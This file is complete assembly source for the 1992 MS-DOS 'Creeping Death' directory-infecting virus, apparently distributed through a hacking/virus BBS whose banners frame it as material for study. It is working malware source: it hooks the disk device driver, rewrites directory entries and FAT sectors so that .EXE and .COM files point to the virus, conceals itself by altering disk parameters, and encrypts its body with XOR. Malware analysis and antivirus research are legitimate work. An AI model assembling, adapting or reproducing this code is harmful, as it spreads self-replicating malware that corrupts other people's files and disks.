Assembly Source File  |  1992-10-11  |  24KB  |  662 lines

  1. ;****************************************************************************;
  2. ;                                                                            ;
  3. ;                     -=][][][][][][][][][][][][][][][=-                     ;
  4. ;                     -=]  P E R F E C T  C R I M E  [=-                     ;
  5. ;                     -=]      +31.(o)79.426o79      [=-                     ;
  6. ;                     -=]                            [=-                     ;
  7. ;                     -=] For All Your H/P/A/V Files [=-                     ;
  8. ;                     -=]    SysOp: Peter Venkman    [=-                     ;
  9. ;                     -=]   CoSysOp: Northstar Ken   [=-                     ;
  10. ;                     -=]                            [=-                     ;
  11. ;                     -=]      +31.(o)79.426o79      [=-                     ;
  12. ;                     -=]  P E R F E C T  C R I M E  [=-                     ;
  13. ;                     -=][][][][][][][][][][][][][][][=-                     ;
  14. ;                                                                            ;
  15. ;                    *** NOT FOR GENERAL DISTRIBUTION ***                    ;
  16. ;                                                                            ;
  17. ; This File is for the Purpose of Virus Study Only! It Should not be Passed  ;
  18. ; Around Among the General Public. It Will be Very Useful for Learning how   ;
  19. ; Viruses Work and Propagate. But Anybody With Access to an Assembler can    ;
  20. ; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding     ;
  21. ; Experience can Turn it Into a far More Malevolent Program Than it Already  ;
  22. ; Is. Keep This Code in Responsible Hands!                                   ;
  23. ;                                                                            ;
  24. ;****************************************************************************;
  25.  
  26. ;*****************************************************************************;
  27. ;                                                                             ;
  28. ; Creeping Death V (Encrypting, try to find it)                               ;
  29. ;                  (Version 4 bug Fixed)                                      ;
  30. ; (c) Copyright 1992 by Bit Addict                                            ;
  31. ;                                                                             ;
  32. ;*****************************************************************************;
  33.  
  34. code segment public 'code'
  35.         assume    cs:code, ds:code, es:code
  36.         org    5ch
  37.  
  38. ;*****************************************************************************;
  39. ;                                                                             ;
  40. ; Data                                                                        ;
  41. ;                                                                             ;
  42. ;*****************************************************************************;
  43.  
  44. BPB_Buf:    db    32 dup(?)        ; buffer for BPB
  45. EncryptWrite2:    db    36 dup(?)        ; Encrypt DoRequest Encrypt
  46.  
  47. Request        equ    this dword        ; address of the request header
  48. RequestOffset    dw    ?
  49. RequestSegment    dw    ?
  50.  
  51.             org    100h
  52.  
  53. ;*****************************************************************************;
  54. ;                                                                             ;
  55. ; Actual start of virus. In this part the virus initializes the stack and     ;
  56. ; adjusts the device driver used by dos to read and write from floppies and   ;
  57. ; hard disks. Then it will start the original exe or com-file                 ;
  58. ;                                                                             ;
  59. ;*****************************************************************************;
  60.  
  61. Encrypt:    mov    si,offset Main-1    ; stub at the entry point: si = first byte to transform (one byte before Main)
  62.         mov    cx,400h-11        ; cx = number of bytes to transform
  63. Repeat:        xor    byte ptr [si],0        ; single-byte XOR over the body; the immediate is the key (0 as assembled = no-op)
  64.         inc    si            ; next byte
  65.         loop    Repeat            ; NOTE(review): the range starts at Main-1, which looks like the last byte of this stub - confirm before treating the whole stub as a fixed byte pattern
  66.  
  67. Main:        mov    sp,600h            ; init stack
  68.         inc    Counter
  69.  
  70. ;*****************************************************************************;
  71. ;                                                                             ;
  72. ; Get dosversion, if the virus is running with dos 4+ then di will be 0 else  ;
  73. ; di will be -1                                                               ;
  74. ;                                                                             ;
  75. ;*****************************************************************************;
  76.  
  77. DosVersion:    mov    ah,30h            ; fn 30h = Get Dosversion
  78.         int    21h            ; int 21h
  79.         cmp    al,4            ; major dosversion 
  80.         sbb    di,di
  81.         mov    byte ptr ds:drive[2],-1    ; set 2nd operand of cmp ah,??
  82.  
  83. ;*****************************************************************************;
  84. ;                                                                             ;
  85. ; Adjust the size of the codesegment, with dos function 4ah                   ;
  86. ;                                                                             ;
  87. ;*****************************************************************************;
  88.  
  89.         mov    bx,60h            ; Adjust size of memory block
  90.         mov    ah,4ah            ; to 60 paragraphs = 600h bytes
  91.         int    21h            ; int 21h
  92.  
  93.         mov    ah,52h            ; get internal list of lists
  94.         int    21h            ; int 21h
  95.  
  96. ;*****************************************************************************;
  97. ;                                                                             ;
  98. ; If the virus code segment is located behind the dos config memory block the ;
  99. ; code segment will be part of the config memory block making it 61h          ;
  100. ; paragraphs larger. If the virus is not located next to the config memory    ;
  101. ; block the virus will set the owner to 8h (Dos system)                       ;
  102. ;                                                                             ;
  103. ;*****************************************************************************;
  104.  
  105.         mov    ax,es:[bx-2]        ; segment of first MCB
  106.         mov    dx,cs            ; dx = MCB of the code segment
  107.         dec    dx
  108. NextMCB:    mov    ds,ax            ; ax = segment next MCB
  109.         add    ax,ds:[3]
  110.         inc    ax
  111.         cmp    ax,dx            ; are they equal ?
  112.         jne    NextMCB            ; no, not 1st program executed
  113.         cmp    word ptr ds:[1],8
  114.         jne    NoBoot
  115.         add    word ptr ds:[3],61h    ; add 61h to size of block
  116. NoBoot:        mov    ds,dx            ; ds = segment of MCB
  117.         mov    word ptr ds:[1],8    ; owner = dos system
  118.  
  119. ;*****************************************************************************;
  120. ;                                                                             ;
  121. ; The virus will search for the disk parameter block for drive a: - c: in     ;
  122. ; order to find the device driver for these block devices. If any of these    ;
  123. ; blocks is found the virus will install its own device driver and set the    ;
  124. ; access flag to -1 to tell dos this device hasn't been accessed yet.         ;
  125. ;                                                                             ;
  126. ;*****************************************************************************;
  127.  
  128.         cld                ; clear direction flag
  129.         lds    bx,es:[bx]        ; get pointer to first drive
  130.                         ; paramenter block
  131.  
  132. Search:        cmp    bx,-1            ; last block ?
  133.         je    Last
  134.         mov    ax,ds:[bx+di+15h]    ; get segment of device header
  135.         cmp    ax,70h            ; dos device header ??
  136.         jne    Next            ; no, go to next device
  137.         xchg    ax,cx
  138.         mov    byte ptr ds:[bx+di+18h],-1 ; set access flag to "drive 
  139.                         ; has not been accessed"
  140.         mov    si,offset Header-4    ; set address of new device
  141.         xchg    si,ds:[bx+di+13h]    ; and save old address
  142.         mov    ds:[bx+di+15h],cs
  143. Next:        lds    bx,ds:[bx+di+19h]    ; next drive parameter block
  144.         jmp    Search
  145.  
  146. ;*****************************************************************************;
  147. ;                                                                             ;
  148. ; If the virus has failed to start the original exe-file it will jump here.   ;
  149. ;                                                                             ;
  150. ;*****************************************************************************;
  151.  
  152. Boot:        mov    ds,ds:[16h]        ; es = parent PSP
  153.         mov    bx,ds:[16h]        ; bx = parent PSP of Parent PSP
  154.         xor    si,si
  155.         sub    bx,1
  156.         jnb    Exec
  157.         mov    ax,cs
  158.         dec    ax
  159.         mov    ds,ax
  160.         mov    cx,8
  161.         mov    si,8
  162.         mov    di,0ffh
  163. Count:        lodsb
  164.         or    al,al
  165.         loopne    Count
  166.         not    cx
  167.         and    cx,7
  168. NextByte:    mov    si,8
  169.         inc    di
  170.         push    di
  171.         push    cx
  172.         rep    cmpsb
  173.         pop    cx
  174.         pop    di
  175.         jne    NextByte
  176. BeginName:    dec    di
  177.         cmp    byte ptr es:[di-1],0
  178.         jne    BeginName
  179.         mov    si,di
  180.         mov    bx,es
  181.         jmp    short Exec
  182.  
  183. ;*****************************************************************************;
  184. ;                                                                             ;
  185. ; If none of these devices is found it means the virus is already resident    ;
  186. ; and the virus wasn't able to start the original exe-file (the file is       ;
  187. ; corrupted by copying it without the virus memory resident). If the device   ;
  188. ; is found the information in the header is copied.                           ;
  189. ;                                                                             ;
  190. ;*****************************************************************************;
  191.  
  192. Last:        jcxz    Exit
  193.  
  194. ;*****************************************************************************;
  195. ;                                                                             ;
  196. ; The information about the dos device driver is copied to the virus code     ;
  197. ; segment                                                                     ;
  198. ;                                                                             ;
  199. ;*****************************************************************************;
  200.  
  201.         mov    ds,cx            ; ds = segment of Device Driver
  202.         add    si,4
  203.         push    cs
  204.         pop    es
  205.         mov    di,offset Header
  206.         movsw
  207.         lodsw
  208.         mov    es:StrBlock,ax
  209.         mov    ax,offset Strategy
  210.         stosw
  211.         lodsw
  212.         mov    es:IntBlock,ax
  213.         mov    ax,offset Interrupt
  214.         stosw
  215.         movsb
  216.  
  217. ;*****************************************************************************;
  218. ;                                                                             ;
  219. ; Deallocate the environment memory block and start this file again, but      ;
  220. ; if the virus succeeds it will start the original exe-file.                  ;
  221. ;                                                                             ;
  222. ;*****************************************************************************;
  223.  
  224.         push    cs
  225.         pop    ds
  226.         mov    bx,ds:[2ch]        ; environment segment
  227.         or    bx,bx            ; =0 ?
  228.         jz    Boot
  229.         mov    es,bx
  230.         mov    ah,49h            ; deallocate memory
  231.         int    21h
  232.         xor    ax,ax
  233.         mov    di,1
  234. Seek:        dec    di            ; scan for end of environment
  235.         scasw
  236.         jne    Seek
  237.         lea    si,ds:[di+2]        ; es:si = start of filename
  238. Exec:        push    bx
  239.         push    cs
  240.         pop    ds
  241.         mov    bx,offset Param
  242.         mov    ds:[bx+4],cs        ; set segments in EPB
  243.         mov    ds:[bx+8],cs
  244.         mov    ds:[bx+12],cs
  245.         pop    ds
  246.         push    cs
  247.         pop    es
  248.  
  249.         mov    di,offset f_name    ; copy name of this file
  250.         push    di
  251.         mov    cx,40
  252.         rep    movsw
  253.         push    cs
  254.         pop    ds
  255.  
  256.         mov    ah,3dh            ; open file, this file will
  257.         mov    dx,offset File        ; not be found but the entire
  258.         int    21h            ; directory is searched and
  259.         pop    dx            ; infected
  260.  
  261.         mov    ax,4b00h        ; execute file
  262.         int    21h
  263. Exit:        mov    ah,4dh            ; get exit-code
  264.         int    21h
  265.         mov    ah,4ch            ; terminate (al = exit code)
  266.         int    21h
  267.  
  268. ;*****************************************************************************;
  269. ;                                                                             ;
  270. ; Installation complete                                                       ;
  271. ;                                                                             ;
  272. ;*****************************************************************************;
  273. ;                                                                             ;
  274. ; The next part contains the device driver used by creeping death to infect   ;
  275. ; directories                                                                 ;
  276. ;                                                                             ;
  277. ; The device driver uses only the strategy routine to handle the requests.    ;
  278. ; I don't know if this is because the virus will work better or the writer    ;
  279. ; of this virus didn't know how to do it right.                               ;
  280. ;                                                                             ;
  281. ;*****************************************************************************;
  282.  
  283.  
  284. Strategy:    mov    cs:RequestOffset,bx    ; driver strategy entry: keep es:bx (request header) for Interrupt
  285.         mov    cs:RequestSegment,es    ; stored offset then segment, so Request can be loaded as one dword
  286.         retf                ; far return to the caller
  287.  
  288. Interrupt:    push    ax            ; driver strategy block
  289.         push    bx
  290.         push    cx            ; save registers
  291.         push    dx
  292.         push    si
  293.         push    di
  294.         push    ds
  295.         push    es
  296.  
  297.         les    bx,cs:Request
  298.         push    es
  299.         pop    ds
  300.         mov    al,ds:[bx+2]        ; Command Code
  301.  
  302.         cmp    al,4            ; Input
  303.         je    Input
  304.         cmp    al,8            ; Output
  305.         je    Output
  306.         cmp    al,9
  307.         je    Output
  308.  
  309.         call    DoRequest
  310.  
  311.         cmp    al,2            ; Build BPB
  312.         jne    Return
  313.         lds    si,ds:[bx+12h]        ; copy the BPB and change it
  314.         mov    di,offset bpb_buf    ; into one that hides the virus
  315.         mov    es:[bx+12h],di
  316.         mov    es:[bx+14h],cs
  317.         push    es            ; copy
  318.         push    cs
  319.         pop    es
  320.         mov    cx,16
  321.         rep    movsw
  322.         pop    es
  323.         push    cs
  324.         pop    ds
  325.         mov    al,ds:[di+2-32]        ; change
  326.         cmp    al,2
  327.         adc    al,0
  328.         cbw
  329.         cmp    word ptr ds:[di+8-32],0    ; >32mb partition ?
  330.         je    m32            ; yes, jump to m32
  331.         sub    ds:[di+8-32],ax        ; <32mb partition
  332.         jmp    short Return
  333. m32:        sub    ds:[di+15h-32],ax    ; >32mb partition
  334.         sbb    word ptr ds:[di+17h-32],0
  335. Return:        pop    es            ; return to caller
  336.         pop    ds
  337.         pop    di
  338.         pop    si
  339.         pop    dx
  340.         pop    cx
  341.         pop    bx
  342.         pop    ax
  343.         retf
  344.  
  345. Output:        mov    cx,0ff09h        ; check if disk changed
  346.         call    check
  347.         jz    InfectSector        ; no, just infect sector
  348.         call    DoRequest        ; yes, write virus to disk
  349.         jmp    short inf_dsk
  350.  
  351. InfectSector:    jmp    _InfectSector        ; infect sector
  352. Read:        jmp    _Read            ; read sector
  353. ReadError:    add    sp,16            ; error during request
  354.         jmp    short Return
  355.  
  356. Input:        call    check            ; check if disk changed
  357.         jz    Read            ; no, read sector
  358. inf_dsk:    mov    byte ptr ds:[bx+2],4    ; yes, write virus to disk
  359.         cld                ; save last part of request
  360.         lea    si,ds:[bx+0eh]
  361.         mov    cx,8
  362. save:        lodsw
  363.         push    ax
  364.         loop    save
  365.         mov    word ptr ds:[bx+14h],1    ; read 1st sector on disk
  366.         call    ReadSector
  367.         jnz    ReadError
  368.         mov    byte ptr ds:[bx+2],2    ; build BPB
  369.         call    DoRequest
  370.         lds    si,ds:[bx+12h]        ; ds:si = BPB
  371.         mov    di,ds:[si+6]        ; size of root directory
  372.         add    di,15            ; in sectors
  373.         mov    cl,4
  374.         shr    di,cl
  375.         mov    al,ds:[si+5]
  376.         cbw
  377.         mov    dx,ds:[si+0bh]
  378.         mul    dx            ; ax=fat sectors, dx=0
  379.         add    ax,ds:[si+3]
  380.         add    di,ax
  381.         push    di            ; save it on stack
  382.         mov    ax,ds:[si+8]        ; total number of sectors
  383.         cmp    ax,dx            ; >32mb
  384.         jnz    more            ; no, skip next 2 instructions
  385.         mov    ax,ds:[si+15h]        ; get number of sectors
  386.         mov    dx,ds:[si+17h]
  387. more:        xor    cx,cx            ; cx=0
  388.         sub    ax,di            ; dx:ax=number is data sectors
  389.         sbb    dx,cx
  390.         mov    cl,ds:[si+2]        ; cx=sectors / cluster
  391.         div    cx            ; number of clusters on disk
  392.         cmp    cl,2            ; 1 sector/cluster ?
  393.         sbb    ax,-1            ; number of clusters (+1 or +2)
  394.         push    ax            ; save it on stack
  395.         call    Convert            ; get fat sector and offset in
  396.         mov    byte ptr es:[bx+2],4    ; sector
  397.         mov    es:[bx+14h],ax
  398.         call    ReadSector        ; read fat sector
  399. again:        lds    si,es:[bx+0eh]
  400.         add    si,dx
  401.         sub    dh,cl            ; has something to do with the
  402.         adc    dx,ax            ; encryption of the pointers
  403.         mov    word ptr cs:[gad+1],dx
  404.         cmp    cl,1            ; 1 sector / cluster
  405.         jne    Ok
  406. SmallModel:    not    di            ; this is used when the
  407.         and    ds:[si],di        ; clusters are 1 sector long
  408.         pop    ax
  409.         push    ax
  410.         inc    ax
  411.         push    ax
  412.         mov    dx,0fh
  413.         test    di,dx
  414.         jz    here
  415.         inc    dx
  416.         mul    dx
  417. here:        or    ds:[si],ax
  418.         pop    ax
  419.         call    Convert
  420.         mov    si,es:[bx+0eh]
  421.         add    si,dx
  422. Ok:        mov    ax,ds:[si]
  423.         and    ax,di
  424.         mov    dx,di            ; allocate cluster
  425.         dec    dx
  426.         and    dx,di
  427.         not    di
  428.         and    ds:[si],di
  429.         or    ds:[si],dx
  430.         cmp    ax,dx            ; cluster already allocated by
  431.         pop    ax            ; the virus ?
  432.         pop    di
  433.         mov    word ptr cs:[pointer+1],ax
  434.         je    _Read_            ; yes, don't write it and go on
  435.         mov    dx,ds:[si]
  436.         push    ds
  437.         push    si
  438.         mov    byte ptr es:[bx+2],8    ; write
  439.         call    DoRequest        ; write the adjusted sector to
  440.         pop    si            ; disk
  441.         pop    ds
  442.         jnz    _Read_
  443.         call    ReadSector        ; read it again
  444.         cmp    ds:[si],dx        ; is it written correctly ?
  445.         jne    _Read_            ; no, can't infect disk
  446.         dec    ax
  447.         dec    ax            ; calculate the sector number
  448.         mul    cx            ; to write the virus to
  449.         add    ax,di
  450.         adc    dx,0
  451.         push    es
  452.         pop    ds
  453.         mov    word ptr ds:[bx+12h],2
  454.         mov    ds:[bx+14h],ax        ; store it in the request hdr
  455.         test    dx,dx
  456.         jz    less
  457.         mov    word ptr ds:[bx+14h],-1
  458.         mov    ds:[bx+1ah],ax
  459.         mov    ds:[bx+1ch],dx
  460. less:        mov    ds:[bx+10h],cs
  461.         mov    ds:[bx+0eh],100h
  462.         mov    byte ptr es:[bx+2],8    ; write it
  463.         call    EncryptWrite1
  464.  
  465. _Read_:        mov    byte ptr ds:[bx+2],4    ; restore this byte
  466.         std                ; restore other part of the
  467.         lea    di,ds:[bx+1ch]        ; request
  468.         mov    cx,8
  469. load:        pop    ax
  470.         stosw
  471.         loop    load
  472. _Read:        call    DoRequest        ; do request
  473.  
  474.         mov    cx,9
  475. _InfectSector:    mov    di,es:[bx+12h]        ; get number of sectors read
  476.         lds    si,es:[bx+0eh]        ; get address of data
  477.         sal    di,cl            ; calculate end of buffer
  478.         xor    cl,cl
  479.         add    di,si
  480.         xor    dl,dl
  481.         push    ds            ; infect the sector
  482.         push    si
  483.         call    find
  484.         jcxz    no_inf            ; write sector ?
  485.         mov    al,8
  486.         xchg    al,es:[bx+2]        ; save command byte
  487.         call    DoRequest        ; write sector
  488.         mov    es:[bx+2],al        ; restore command byte
  489.         and    byte ptr es:[bx+4],07fh
  490. no_inf:        pop    si
  491.         pop    ds
  492.         inc    dx            ; disinfect sector in memory
  493.         call    find
  494.         jmp    Return            ; return to caller
  495.  
  496. ;*****************************************************************************;
  497. ;                                                                             ;
  498. ; Subroutines                                                                 ;
  499. ;                                                                             ;
  500. ;*****************************************************************************;
  501.  
  502. find:        mov    ax,ds:[si+8]        ; walk 32-byte directory entries in ds:si..di; dl = 0 alters them, dl <> 0 restores them
  503.         cmp    ax,"XE"            ; check for .exe
  504.         jne    com
  505.         cmp    ds:[si+10],al        ; third extension byte must equal al
  506.         je    found
  507. com:        cmp    ax,"OC"            ; check for .com
  508.         jne    go_on
  509.         cmp    byte ptr ds:[si+10],"M"
  510.         jne    go_on
  511. found:        test    word ptr ds:[si+1eh],0ffc0h ; file too big
  512.         jnz    go_on                ; more than 4mb
  513.         test    word ptr ds:[si+1dh],03ff8h ; file too small
  514.         jz    go_on                ; less than 2048 bytes
  515.         test    byte ptr ds:[si+0bh],1ch    ; directory, system or
  516.         jnz    go_on                ; volume label
  517.         test    dl,dl            ; infect or disinfect ?
  518.         jnz    rest
  519. pointer:    mov    ax,1234h        ; ax = viral cluster (immediate is patched at run time via pointer+1)
  520.         cmp    ax,ds:[si+1ah]        ; file already infected ?
  521.         je    go_on            ; yes, go on
  522.         xchg    ax,ds:[si+1ah]        ; entry now points at the viral cluster, ax = original start cluster
  523. gad:        xor    ax,1234h        ; mask the original value with the rolling key (immediate is patched via gad+1)
  524.         mov    ds:[si+14h],ax        ; forensic indicator: altered entries share one value at +1ah and carry the masked original at +14h
  525.         loop    go_on            ; decrement cx; the caller checks cx with jcxz before writing the sector back
  526. rest:        xor    ax,ax            ; ax = 0
  527.         xchg    ax,ds:[si+14h]        ; fetch the masked value and clear the +14h field
  528.         xor    ax,word ptr cs:[gad+1]    ; unmask with the same key
  529.         mov    ds:[si+1ah],ax        ; put the original start cluster back in the in-memory copy
  530. go_on:        rol    word ptr cs:[gad+1],1    ; rotate the key once per entry, whether or not it matched
  531.         add    si,32            ; next directory entry
  532.         cmp    di,si            ; end of buffer ?
  533.         jne    find            ; no, do it again
  534.         ret                ; return
  535.  
  536. check:        mov    ah,ds:[bx+1]            ; get number of unit
  537. drive:        cmp    ah,-1                ; same unit as the previous call ? (immediate is patched on the next line)
  538.         mov    byte ptr cs:[drive+2],ah    ; self-modifying: store this unit as the cmp immediate; mov leaves flags intact
  539.         jne    changed                ; different unit: return with zf = 0
  540.         push    ds:[bx+0eh]            ; save word
  541.         mov    byte ptr ds:[bx+2],1        ; command 1: disk changed ?
  542.         call    DoRequest            ; pass the query to the original driver
  543.         cmp    byte ptr ds:[bx+0eh],1        ; zf = 1 when the returned byte is 1; callers treat zf = 1 as "not changed"
  544.         pop    ds:[bx+0eh]            ; restore word (pop does not alter flags)
  545.         mov    ds:[bx+2],al            ; restore command; presumably al still holds the code read in Interrupt - confirm
  546. changed:    ret                    ; return with zf as set above
  547.  
  548. ReadSector:    mov    word ptr es:[bx+12h],1        ; set the count field to 1, then fall through into DoRequest
  549.  
  550. DoRequest:    db    09ah            ; hand-assembled far call (opcode 9ah) to 70:?, original strategy
  551. StrBlock    dw    ?,70h            ; offset word is filled in during installation (mov es:StrBlock,ax)
  552.         db    09ah            ; second far call to 70:?, original interrupt
  553. IntBlock    dw    ?,70h            ; offset word is filled in during installation (mov es:IntBlock,ax)
  554.         test    byte ptr es:[bx+4],80h    ; error bit set in the request header ? yes, zf = 0
  555.         ret                ; return, callers branch on zf
  556.  
  557. Convert:    cmp    ax,0ff0h        ; ax = cluster number; below 0ff0h takes the 12-bit FAT path
  558.         jae    fat_16            ; otherwise FAT entries are handled as 16-bit words
  559.         mov    si,3            ; multiplier 3 (entry offset = cluster * 3 / 2)
  560.         xor    word ptr cs:[si+gad-1],si    ; self-modifying: alters the word at gad+2 - NOTE(review): appears to perturb find's key, confirm
  561.         mul    si                ; dx:ax = cluster * 3
  562.         shr    ax,1            ; ax = byte offset of the FAT entry, cf = 1 for an odd cluster
  563.         mov    di,0fffh        ; mask for an even entry (mov keeps cf for the jnc)
  564.         jnc    cont
  565.         mov    di,0fff0h        ; mask for an odd entry
  566.         jmp    short cont
  567. fat_16:        mov    si,2
  568.         mul    si            ; dx:ax = cluster * 2 = byte offset of the FAT entry
  569.         mov    di,0ffffh        ; mask covers the whole word
  570. cont:        mov    si,512            ; fixed 512-byte sector size
  571.         div    si            ; ax = sector index within the FAT, dx = offset inside that sector
  572.         inc    ax            ; +1, presumably the sector(s) ahead of the FAT - confirm
  573.         ret                ; out: ax = sector, dx = offset, di = entry mask
  574.  
  575. EncryptWrite1:    push    ds            ; assemble a 36-byte routine in the EncryptWrite2 buffer, then jump to it
  576.         push    cs
  577.         pop    ds            ; ds = cs for the copies below
  578.         push    es            ; keep the request header segment
  579.         push    cs
  580.         pop    es            ; es = cs, destination of the copies
  581.         cld                ; copy forwards
  582.         mov    cx,12            ; length of the Encrypt stub
  583.         mov    si,offset Encrypt
  584.         mov    di,offset EncryptWrite2
  585.         inc    byte ptr ds:[si+8]    ; bump the byte at Encrypt+8 before copying - presumably the xor key immediate, confirm
  586.         rep    movsb            ; part 1: copy of the Encrypt stub
  587.         mov    cl,10            ; cx is 0 after rep, so cl alone sets the next length
  588.         mov    si,offset DoRequest
  589.         rep    movsb            ; part 2: the two far calls at DoRequest (10 bytes)
  590.         mov    cl,12
  591.         mov    si,offset Encrypt
  592.         rep    movsb            ; part 3: second copy of the stub; the same xor applied twice restores the bytes
  593.         mov    ax,0c31fh        ; bytes 1fh, 0c3h = pop ds / ret
  594.         stosw                ; part 4: terminator, total 12+10+12+2 = 36 bytes
  595.         pop    es            ; es = request header segment again; the saved ds is popped by the generated code
  596.         jmp    EncryptWrite2        ; run the generated routine
  597.  
  598. ;*****************************************************************************;
  599. ;                                                                             ;
  600. ; Data                                                                        ;
  601. ;                                                                             ;
  602. ;*****************************************************************************;
  603.  
  604. File:        db    "C:",255,0        ; the virus tries to open this
  605.                         ; file
  606.  
  607. Counter        dw    0            ; this will count the number of
  608.                         ; systems that are infected by
  609.                         ; this virus
  610.  
  611. Param:        dw    0,80h,?,5ch,?,6ch,?    ; parameters for the
  612.                         ; exec-function
  613.  
  614. Signature    db    'CREEPING DEATH 3'    ; Signature
  615.  
  616. Header        db    7 dup(?)        ; this is the header for the
  617.                         ; device driver
  618.  
  619. f_name:        db    ?            ; Buffer for the filename used
  620.                         ; by the exec-function
  621.  
  622. ;*****************************************************************************;
  623. ;                                                                             ;
  624. ; The End                                                                     ;
  625. ;                                                                             ;
  626. ;*****************************************************************************;
  627.  
  628. code ends
  629.  
  630. end Encrypt
  631.  
  632. ;****************************************************************************;
  633. ;                                                                            ;
  634. ;                     -=][][][][][][][][][][][][][][][=-                     ;
  635. ;                     -=]  P E R F E C T  C R I M E  [=-                     ;
  636. ;                     -=]      +31.(o)79.426o79      [=-                     ;
  637. ;                     -=]                            [=-                     ;
  638. ;                     -=] For All Your H/P/A/V Files [=-                     ;
  639. ;                     -=]    SysOp: Peter Venkman    [=-                     ;
  640. ;                     -=]   CoSysOp: Northstar Ken   [=-                     ;
  641. ;                     -=]                            [=-                     ;
  642. ;                     -=]      +31.(o)79.426o79      [=-                     ;
  643. ;                     -=]  P E R F E C T  C R I M E  [=-                     ;
  644. ;                     -=][][][][][][][][][][][][][][][=-                     ;
  645. ;                                                                            ;
  646. ;                    *** NOT FOR GENERAL DISTRIBUTION ***                    ;
  647. ;                                                                            ;
  648. ; This File is for the Purpose of Virus Study Only! It Should not be Passed  ;
  649. ; Around Among the General Public. It Will be Very Useful for Learning how   ;
  650. ; Viruses Work and Propagate. But Anybody With Access to an Assembler can    ;
  651. ; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding     ;
  652. ; Experience can Turn it Into a far More Malevolent Program Than it Already  ;
  653. ; Is. Keep This Code in Responsible Hands!                                   ;
  654. ;                                                                            ;
  655. ;****************************************************************************;
  656.  
  657. ;─────────────────────────────────────────────────────────────────────────;
  658. ;──────────────────> and Remember Don't Forget to Call <──────────────────;
  659. ;────────────> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <──────────;
  660. ;─────────────────────────────────────────────────────────────────────────;
  661.  
  662.